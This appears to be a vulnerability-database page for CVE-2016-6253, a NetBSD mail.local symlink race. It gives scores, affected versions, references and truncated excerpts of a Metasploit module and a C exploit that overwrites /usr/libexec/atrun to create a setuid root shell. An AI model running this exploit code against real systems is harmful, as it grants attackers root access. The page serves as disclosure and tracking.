CVE-2016-6253
published 2017-01-20CVE-2016-6253: mail.local in NetBSD versions 6.0 through 6.0.6, 6.1 through 6.1.5, and 7.0 allows local users to change ownership of or append data to arbitrary files on the…
PriorityP345high7.8CVSS 3.0
AVLACLPRLUINSUCHIHAH
EXPLOIT
EPSS
3.53%
87.8th percentile
mail.local in NetBSD versions 6.0 through 6.0.6, 6.1 through 6.1.5, and 7.0 allows local users to change ownership of or append data to arbitrary files on the target system via a symlink attack on the user mailbox.
Affected
14 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
| netbsd | netbsd | — | — |
CVSS provenance
nvdv3.07.8HIGHCVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.2HIGHAV:L/AC:L/Au:N/C:C/I:C/A:C
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
NetBSD - 'mail.local(8)' Local Privilege Escalation (Metasploit)
exploitdb·2016-09-15
CVE-2016-6253 NetBSD - 'mail.local(8)' Local Privilege Escalation (Metasploit)
NetBSD - 'mail.local(8)' Local Privilege Escalation (Metasploit)
---
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require "msf/core"
class MetasploitModule 'NetBSD mail.local Privilege Escalation',
'Description' => %q{
This module attempts to exploit a race condition in mail.local with SUID bit set on:
NetBSD 7.0 - 7.0.1 (verified on 7.0.1)
NetBSD 6.1 - 6.1.5
NetBSD 6.0 - 6.0.6
Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
},
'License' => MSF_LICENSE,
'Author' =>
[
'h00die ', # Module
'akat1' # Discovery
],
'DisclosureDate' => 'Jul 07 2016',
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'SessionTypes' => %w{shell meterpreter},
'Privilege
Exploit-DB
NetBSD - 'mail.local(8)' Local Privilege Escalation
exploitdb·2016-07-21
CVE-2016-6253 NetBSD - 'mail.local(8)' Local Privilege Escalation
NetBSD - 'mail.local(8)' Local Privilege Escalation
---
// Source: http://akat1.pl/?id=2
#include
#include
#include
#include
#include
#include
#include
#include
#define ATRUNPATH "/usr/libexec/atrun"
#define MAILDIR "/var/mail"
static int
overwrite_atrun(void)
{
char *script = "#! /bin/sh\n"
"cp /bin/ksh /tmp/ksh\n"
"chmod +s /tmp/ksh\n";
size_t size;
FILE *fh;
int rv = 0;
fh = fopen(ATRUNPATH, "wb");
if (fh == NULL) {
rv = -1;
goto out;
}
size = strlen(script);
if (size != fwrite(script, 1, strlen(script), fh)) {
rv = -1;
goto out;
}
out:
if (fh != NULL && fclose(fh) != 0)
rv = -1;
return rv;
}
static int
copy_file(const char *from, const char *dest, int create)
{
char buf[1024];
FILE *in = NULL, *out = NULL;
size_t size;
int rv = 0, fd;
in = fopen(from, "rb");
if (create == 0
Metasploit
NetBSD mail.local Privilege Escalation
metasploit
NetBSD mail.local Privilege Escalation
NetBSD mail.local Privilege Escalation
This module attempts to exploit a race condition in mail.local with SUID bit set on: NetBSD 7.0 - 7.0.1 (verified on 7.0.1) NetBSD 6.1 - 6.1.5 NetBSD 6.0 - 6.0.6 Successful exploitation relies on a crontab job with root privilege, which may take up to 10min to execute.
No writeups or analysis indexed.
http://akat1.pl/?id=2http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.aschttp://packetstormsecurity.com/files/138021/NetBSD-mail.local-8-Local-Root.htmlhttp://www.rapid7.com/db/modules/exploit/unix/local/netbsd_mail_localhttp://www.securityfocus.com/bid/92101http://www.securitytracker.com/id/1036429https://www.exploit-db.com/exploits/40141/https://www.exploit-db.com/exploits/40385/http://akat1.pl/?id=2http://ftp.netbsd.org/pub/NetBSD/security/advisories/NetBSD-SA2016-006.txt.aschttp://packetstormsecurity.com/files/138021/NetBSD-mail.local-8-Local-Root.htmlhttp://www.rapid7.com/db/modules/exploit/unix/local/netbsd_mail_localhttp://www.securityfocus.com/bid/92101http://www.securitytracker.com/id/1036429https://www.exploit-db.com/exploits/40141/https://www.exploit-db.com/exploits/40385/
2017-01-20
Published